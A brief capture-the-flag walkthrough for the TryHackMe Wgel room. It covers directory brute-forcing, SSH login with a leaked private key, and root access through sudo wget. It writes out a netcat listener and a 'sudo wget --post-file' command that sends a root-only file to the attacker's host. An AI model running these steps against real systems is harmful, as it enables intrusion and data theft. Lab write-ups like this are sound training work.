Wgel CTF

https://tryhackme.com/room/wgelctf

Open Ports:

• 21: ssh
• 80: HTTP

Port 80:

Found name Jxxxxe in source page of index page

1. find sub-doamisn and directories usind dirb
   • ip/sitemap/.ssh (Found a private ssh key)

Gaining Access:

• Save the key in a text file and change mode to 600

   >chmod 600 key.txt
  

• Connect to SSH using the key

  >ssh -i key.txt jxxxxe@ip
  

  USER Flag:

  

Privilege Escalation:

• sudo -l
  • Only user/bin/wget allowed as suoder
  • Open netcat port 80 on host

      >nc -lvpn 80 >flag.txt
    

  • In target

    >sudo wget --post-file=/root/root_flag.txt ip_of_host
    

Root Flag: